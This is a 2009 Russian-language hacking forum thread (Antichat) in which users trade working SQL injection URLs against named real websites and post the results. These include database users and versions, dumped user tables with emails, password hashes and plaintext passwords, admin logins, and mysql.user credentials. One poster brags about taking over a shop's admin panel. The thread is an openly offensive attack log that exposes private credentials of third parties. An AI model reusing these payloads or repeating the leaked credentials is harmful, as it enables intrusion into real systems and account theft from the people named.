Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
17.01.2009, 21:26
|
|
Познающий
Регистрация: 03.06.2007
Сообщений: 44
Провел на форуме:
418827
Репутация:
48
|
|
http://www.overclockers.co.uk/showproduct.php?prodid=CD-092-LO&groupid=701&catid=10&subcat=-314+union+select+user(),version(),database()/*
http://www.sitcom.co.uk/news/news.php?story=-000456+union+select+1,concat_ws(char(58),user(),ve rsion(),database()),3,4,5,6,7,8,9,10,11,12/*
sitcom_work@localhost
4.1.22-standard-log
sitcom_BSG
http://www.sitcom.co.uk/news/news.php?story=-000456+union+select+1,concat_ws(char(58),email,pas sword),3,4,5,6,7,8,9,10,11,12+from+users/*
contact@sitcom.co.uk:5ddadf914707c31330fa85b78ac3e 9e4:testing8
http://www.sitcom.co.uk/login/login.php
http://www.sff.co.uk/display_article.php?articleid=-160+union+select+1,binary(user()),3,4,binary(versi on()),6/*
sff_user@viki.clarkcomputers.co.uk
4.1.15-standard
SFF_prod
Последний раз редактировалось jokester; 17.01.2009 в 21:36..
Причина: БОЯНЫ
|
|
|
18.01.2009, 16:33
|
|
Участник форума
Регистрация: 14.01.2008
Сообщений: 174
Провел на форуме:
800953
Репутация:
443
|
|
http://utf1.com/book.php?id=90980981563+union+select+1,2,concat_ws (0x3a,user(),version(),database())--
Version:4.1.22-standard
User:tw711co_man@localhost
Database:tw711co_movies
http://www.walkerbooks.com/books/catalog.php?key=909888422+union+select+1,2,3,4,con cat_ws(0x3a,user(),version(),database()),6,7,8,9,1 0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--
Database Version: 5.0.67-log
Database name: walkerco_booksDB
User name: walkerco_r@209.68.1.150
http://www.cool-wallpapers.net/tellwall.php?id=330988881+union+select+1,2,3,4,5,6 ,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,2 4,25,26,27,28,concat_ws(0x3a,user(),version(),data base()),30,31,32,33,34,35--
Вывод на картиночке -)
Database Version: 5.0.67-community
Database name: coolwall_fondos
User name: coolwall_coolwal@localhost
Нужное нам в количестве 1100
http://www.cool-wallpapers.net/tellwall.php?id=330988881+UNION+SELECT+1,2,3,4,5,6 ,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,2 4,25,26,27,28,CONCAT(0x7873716C696E6A626567696E,(S ELECT+CONCAT(nombre,0x7873716C696E6A64656C,nick,0x 7873716C696E6A64656C,contrasena,0x7873716C696E6A64 656C,pais,0x7873716C696E6A64656C,email,0x7873716C6 96E6A64656C,code)+FROM+coolwall_fondos.usuarios+LI MIT+3,1),0x7873716C696E6A656E64),30,31,32,33,34,35--
[1]:Ricardo Hempel:rickhs:cosmic7:44:ricardo@prohost.cl:0iqzlj c1719eC6FKIkpX2
[2]:artek:masterartek:donkeykong:228:masterartek@yaho o.com:0wJAb4z1rZ3745pB1wMkF
[3]:Juan Carlos:Juank:kipipa:44:rickhs@gmail.com:0323DsZ4Nm PRK8122PUdr
итд....
МАГАЗИН КНИГ
http://www.bookpassage.com/article.php?id=9012345183+union+select+concat_ws(0 x3a,user(),version(),database()),2--
Database Version: 5.0.27-standard
Database name: Clients_Bookpassage
User name: Bookpassage@localhost
Это сами -)
Vineyard Gazette Online
http://www.mvgazette.com/gallery.php?4390888756/**/union/**/select/**/1,2,3,4,5,6,7,8,concat_ws(0x3a,user(),version(),da tabase()),10--
User:gazette_write@localhost
Version:5.0.51a-3ubuntu5.1
Database:gazette_online
|
|
|
|
18.01.2009, 19:09
|
|
Новичок
Регистрация: 07.09.2008
Сообщений: 26
Провел на форуме:
430982
Репутация:
26
|
|
Код:
http://ua.salvationchurch.com.ua/news?id=-243+union+select+1,2,concat_ws(0x3a,user(),version(),database()),4,5
salvchurch_ua@beta
4.1.22-log
salvchurch_ua
Код:
http://sdl.com.ua/index.php?page=news_item&id=-78+union+select+1,2,3,concat_ws(0x3a,user(),version(),database()),5
sdl@beta
4.1.22-log
sdl
Код:
http://www.selteq.com/tablename/sq_news_items/id/-247+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15
rssi_selteq@beta
4.1.22-log
rssi_selteq
Код:
http://razno.ru/out/?id=1796+union+select+concat_ws(0x3a,version(),database(),user())
5.0.67-log
u10534
u10534@10.10.10.131
Код:
http://safarov.ru/06.php?act=news_by_id&news_id=-15208+union+select+1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8--
iran@localhost
4.1.22-log
site_safarov
Код:
http://hcdynamo.com/?player&id=-1051+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,user(),version(),database()),10,11,12
hcdynamo@localhost
4.1.22-log
hcdynamodb |
|
|
|
18.01.2009, 20:50
|
|
Участник форума
Регистрация: 14.01.2008
Сообщений: 174
Провел на форуме:
800953
Репутация:
443
|
|
http://www.fract.org/forums/index.php?sujet=55237987987987+union+select+concat _ws(0x3a,user(),version(),database()),2,3,4,5--
Database Version: 4.0.24_Debian-10sarge1-log
Database name: fractal
User name: fractal@localhost
http://alternativeanswers.kefirtanesi.com/index.php?id=9088976331+union+select+1,2,3,4,conca t_ws(0x3a,user(),version(),database())--
Database Version: 5.0.67-log
Database name: mailarchive
User name: okul@qian2k.com
http://www.tv3o.com/episode.php?id=3809809870831+union+select+concat_w s(0x3a,user(),version(),database()),2,3,4--
User:tv3ouser@localhost
Version:4.1.20
Database:tv3o
|
|
|
|
19.01.2009, 01:30
|
|
Новичок
Регистрация: 07.11.2008
Сообщений: 17
Провел на форуме:
51589
Репутация:
55
|
|
Сообщение от wildshaman
https://www.bioinquire.com/product-profile.php?ID=-1+union+select+1,2,concat_ws(0x3a,email,userpass), 4,5,6,7,8,9,10,11,12+FROM+Tigeradmin_Users+limit+0 ,1+--
jeremy@jhousemedia.com:ta21XwWv/Yggk
чем пароль зашифрован - не могу понять?
Это DES(Unix)
|
|
|
|
19.01.2009, 05:49
|
|
Участник форума
Регистрация: 25.04.2007
Сообщений: 176
Провел на форуме:
1957988
Репутация:
739
|
|
www.boosthead.com
http://www.boosthead.com/product.php?id=-18+union+select+1,2,3,4,5,6,aes_decrypt(aes_encryp t(concat_ws(0x3a,user(),version()),0x71),0x71),8,9 ,10,11,12,13,14,15,16,17,18,19,20,21/*
boosthead1@66.33.219.67:4.1.16-standard-log
доступа к mysql.user,таблы не подбирал,но сомневаюсь что там есть что-нить интересное.
www.pitatel.ru
http://www.pitatel.ru/mclass.php?id=2+and+1=222+union+select+1,concat_ws (0x3a,user(),version(),database())+from+mysql.user/*
http://www.pitatel.ru/product.php?id=5811+AND+1=2+union+select+1,2,3,con cat_ws(0x3a,user(),version(),database()),5,6,7,8,9/*
root@localhost:4.0.22-standard:mysql
http://www.pitatel.ru/mclass.php?id=2+and+1=222+union+select+1,concat_ws (0x3a,user,password,host,file_priv)+from+mysql.use r/*
root::localhost:N
::localhost:N
::main.hs.orc.ru:N
root::main.hs.orc.ru:Y
http://www.twn.tuv.com
http://www.twn.tuv.com/english/news/news_details4.asp?cate=30&n_no=1+union+select+1,2, 3,4,5,6,7,8,9,10,11,concat_ws(0x3a,user(),database (),version()),13,14,15/*
administrator@localhost:tuv:4.0.15-nt-log
хмм...идём дальше...
http://www.twn.tuv.com/english/news/news_details4.asp?cate=30&n_no=1+union+select+1,2, 3,4,5,6,7,8,9,10,11,concat_ws(0x3a,user,password,h ost),13,14,15+from+mysql.user/*
root без пароля,жаль что localhost,смотри дальше...
http://www.twn.tuv.com/english/news/news_details4.asp?cate=30&n_no=1+union+select+1,2, 3,4,5,6,7,8,9,10,11,concat_ws(0x3a,user,password,h ost),13,14,15+from+mysql.user+limit+1,1/*
root::%
а это уже оч. интересно),смотрим дальше через лимит
::localhost
::%
administrator:6f413e564c08bbe7:localhost
administrator:6f413e564c08bbe7:%
webuser:7bd4ed7716dedbad:127.0.0.1
administrator:40d09e975f996754:10.160.15.84
administrator:40d09e975f996754:10.160.15.72
hct:40d09e975f996754:asktuv.twn.tuv.com
hct:40d09e975f996754:172.16.48.7
hct:40d09e975f996754:taipei-databases.twn.tuv.com
бывает.... 
Последний раз редактировалось ILYAtirtir; 19.01.2009 в 14:49..
|
|
|
|
19.01.2009, 07:35
|
|
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497
Репутация:
303
|
|
http://www.sex-shop-online.net/ndex.php?blockyid=catalog&cat=-1+union+select+concat_ws(0x3a3a,username,password) +from+pref_users--
http://www.sex-shop-online.net/admin/
login:admin
pass:tyeugdc
Админим магазин самотыков...
|
|
|
|
19.01.2009, 17:51
|
|
Новичок
Регистрация: 06.02.2008
Сообщений: 10
Провел на форуме:
66732
Репутация:
9
|
|
http://www.usadba.ru/city/flat/213123/?ddd
Unknown column '213123ddd' in 'where clause'
http://www.usadba.ru/city/flat/213123/? or 1=1-- - выполняется на ура
http://www.usadba.ru/city/flat/213123/? union select 1--
пишет
The used SELECT statements have a different number of columns
Количество полей так подобрать и не удалось.
Версия, выше 5й, т.к., information_schema присутствует
http://www.usadba.ru/city/flat/213123/?+AND+(select+*+from+information_schema.tables)=1--
-----
Operand should contain 21 column(s)
Вообщем, если кто сможет подобрать количество полей - отпишитесь пожалуйста.
|
|
|
|
19.01.2009, 21:28
|
|
Постоянный
Регистрация: 20.11.2008
Сообщений: 406
Провел на форуме:
2358980
Репутация:
930
|
|
CDKWeb
Код:
https://www.cdkweb.com/inthenewsdetails.php?id=-19+union+select+1,concat(user(),0x3a,version(),0x3a,database()),3,4,5,6,7--
user(): cdkuser@localhost
version(): 4.1.22
database(): cdk
PR: 6
таблицы не подобрал((
Fortune Software
Код:
http://cfortune.kics.bc.ca/templates/chili.pepper/index.php?id=-19+union+select+1,2,concat(version(),0x3a,user(),0x3a,database()),4,5,6--
user(): cfortune@localhost
version(): 5.0.51a-3ubuntu5.4
database(): cfortune
тИЦ: 10
PR: 4
таблиц куча:
c_reg_users
user
dating_users
из c_reg_users:
admin:bed128365216c019988915ed3add75fb
auctiontal:ba69897483886f0d2b0afb6345b76c0c
из user:
cfortune:jamocha
gina:gina
evemiranda:eve1
Последний раз редактировалось z00MAN; 20.01.2009 в 10:27..
|
|
|
|
19.01.2009, 22:28
|
|
Участник форума
Регистрация: 25.05.2007
Сообщений: 147
Провел на форуме:
2313429
Репутация:
728
|
|
http://forge.mysql.com
Код:
http://forge.mysql.com/tools/search.php?sortby=(added_on*if(ascii(substring((select+version()+from+information_schema.tables+limit+1,1),1,1))=53,1,-1))&sortorder=desc&page=9
Инъекция после ордер бай, крутить очень долго, даже со скриптами
p.s. история повторяется =)
http://forum.antichat.ru/showpost.php?p=520975&postcount=1
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
